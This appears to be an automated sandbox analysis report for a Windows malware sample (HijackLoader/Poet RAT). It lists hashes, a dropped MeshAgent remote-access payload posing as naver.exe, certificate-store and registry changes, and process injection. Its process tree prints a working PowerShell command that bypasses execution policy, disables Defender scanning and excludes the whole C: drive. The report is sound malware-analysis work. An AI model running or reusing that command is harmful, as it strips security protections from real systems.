Analysis
-
max time kernel
94s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2024 11:28
Static task
static1
Behavioral task
behavioral1
Sample
2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
Resource
win7-20240903-en
General
-
Target
2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
-
Size
19.0MB
-
MD5
e664e32eae75f70aca3b95397beb8706
-
SHA1
ca649ca8a6f15876d56f7a3491f7435f5b0df8ef
-
SHA256
d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402
-
SHA512
d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a
-
SSDEEP
393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK
Malware Config
Signatures
-
Detects MeshAgent payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\naver\naver.exe family_meshagent -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 17 4436 powershell.exe 19 4436 powershell.exe 20 4436 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 2848 powershell.exe 2244 powershell.exe 1904 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
naver.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" naver.exe -
Executes dropped EXE 2 IoCs
Processes:
naver.exenaver.exepid process 1768 naver.exe 1876 naver.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 64 IoCs
Processes:
naver.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\dll\user32.pdb naver.exe File opened for modification C:\Windows\System32\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\dll\shcore.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\shell32.pdb naver.exe File opened for modification C:\Windows\System32\dll\shell32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\dll\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\ole32.pdb naver.exe File opened for modification C:\Windows\System32\shcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\gdiplus.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549 naver.exe File opened for modification C:\Windows\System32\dll\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\user32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb naver.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549 naver.exe File opened for modification C:\Windows\System32\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5 naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\1FEA0AE7DF9C1CE8F405F73E716F0906B8F38B20 naver.exe File opened for modification C:\Windows\System32\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5 naver.exe File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\DLL\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\bcrypt.pdb naver.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exenaver.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716509109858256" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" naver.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" naver.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Processes:
2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exechrome.exepid process 4436 powershell.exe 2244 powershell.exe 4436 powershell.exe 2244 powershell.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe 4016 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exechrome.exemsedge.exepowershell.exewmic.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 4016 chrome.exe Token: SeDebugPrivilege 5072 msedge.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeAssignPrimaryTokenPrivilege 716 wmic.exe Token: SeIncreaseQuotaPrivilege 716 wmic.exe Token: SeSecurityPrivilege 716 wmic.exe Token: SeTakeOwnershipPrivilege 716 wmic.exe Token: SeLoadDriverPrivilege 716 wmic.exe Token: SeSystemtimePrivilege 716 wmic.exe Token: SeBackupPrivilege 716 wmic.exe Token: SeRestorePrivilege 716 wmic.exe Token: SeShutdownPrivilege 716 wmic.exe Token: SeSystemEnvironmentPrivilege 716 wmic.exe Token: SeUndockPrivilege 716 wmic.exe Token: SeManageVolumePrivilege 716 wmic.exe Token: SeAssignPrimaryTokenPrivilege 716 wmic.exe Token: SeIncreaseQuotaPrivilege 716 wmic.exe Token: SeSecurityPrivilege 716 wmic.exe Token: SeTakeOwnershipPrivilege 716 wmic.exe Token: SeLoadDriverPrivilege 716 wmic.exe Token: SeSystemtimePrivilege 716 wmic.exe Token: SeBackupPrivilege 716 wmic.exe Token: SeRestorePrivilege 716 wmic.exe Token: SeShutdownPrivilege 716 wmic.exe Token: SeSystemEnvironmentPrivilege 716 wmic.exe Token: SeUndockPrivilege 716 wmic.exe Token: SeManageVolumePrivilege 716 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4224 wmic.exe Token: SeIncreaseQuotaPrivilege 4224 wmic.exe Token: SeSecurityPrivilege 4224 wmic.exe Token: SeTakeOwnershipPrivilege 4224 wmic.exe Token: SeLoadDriverPrivilege 4224 wmic.exe Token: SeSystemtimePrivilege 4224 wmic.exe Token: SeBackupPrivilege 4224 wmic.exe Token: SeRestorePrivilege 4224 wmic.exe Token: SeShutdownPrivilege 4224 wmic.exe Token: SeSystemEnvironmentPrivilege 4224 wmic.exe Token: SeUndockPrivilege 4224 wmic.exe Token: SeManageVolumePrivilege 4224 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4224 wmic.exe Token: SeIncreaseQuotaPrivilege 4224 wmic.exe Token: SeSecurityPrivilege 4224 wmic.exe Token: SeTakeOwnershipPrivilege 4224 wmic.exe Token: SeLoadDriverPrivilege 4224 wmic.exe Token: SeSystemtimePrivilege 4224 wmic.exe Token: SeBackupPrivilege 4224 wmic.exe Token: SeRestorePrivilege 4224 wmic.exe Token: SeShutdownPrivilege 4224 wmic.exe Token: SeSystemEnvironmentPrivilege 4224 wmic.exe Token: SeUndockPrivilege 4224 wmic.exe Token: SeManageVolumePrivilege 4224 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4864 wmic.exe Token: SeIncreaseQuotaPrivilege 4864 wmic.exe Token: SeSecurityPrivilege 4864 wmic.exe Token: SeTakeOwnershipPrivilege 4864 wmic.exe Token: SeLoadDriverPrivilege 4864 wmic.exe Token: SeSystemtimePrivilege 4864 wmic.exe Token: SeBackupPrivilege 4864 wmic.exe Token: SeRestorePrivilege 4864 wmic.exe Token: SeShutdownPrivilege 4864 wmic.exe Token: SeSystemEnvironmentPrivilege 4864 wmic.exe Token: SeUndockPrivilege 4864 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exepowershell.exechrome.exemsedge.exenaver.exedescription pid process target process PID 1636 wrote to memory of 2244 1636 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe powershell.exe PID 1636 wrote to memory of 2244 1636 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe powershell.exe PID 1636 wrote to memory of 4436 1636 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe powershell.exe PID 1636 wrote to memory of 4436 1636 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe powershell.exe PID 4436 wrote to memory of 4016 4436 powershell.exe chrome.exe PID 4436 wrote to memory of 4016 4436 powershell.exe chrome.exe PID 4436 wrote to memory of 4016 4436 powershell.exe chrome.exe PID 4436 wrote to memory of 4016 4436 powershell.exe chrome.exe PID 4016 wrote to memory of 5072 4016 chrome.exe msedge.exe PID 4016 wrote to memory of 5072 4016 chrome.exe msedge.exe PID 4016 wrote to memory of 5072 4016 chrome.exe msedge.exe PID 4016 wrote to memory of 5072 4016 chrome.exe msedge.exe PID 5072 wrote to memory of 1904 5072 msedge.exe powershell.exe PID 5072 wrote to memory of 1904 5072 msedge.exe powershell.exe PID 5072 wrote to memory of 1768 5072 msedge.exe naver.exe PID 5072 wrote to memory of 1768 5072 msedge.exe naver.exe PID 1876 wrote to memory of 716 1876 naver.exe wmic.exe PID 1876 wrote to memory of 716 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4224 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4224 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4864 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4864 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4592 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4592 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4284 1876 naver.exe wmic.exe PID 1876 wrote to memory of 4284 1876 naver.exe wmic.exe PID 1876 wrote to memory of 988 1876 naver.exe wmic.exe PID 1876 wrote to memory of 988 1876 naver.exe wmic.exe PID 1876 wrote to memory of 2848 1876 naver.exe powershell.exe PID 1876 wrote to memory of 2848 1876 naver.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4436 -
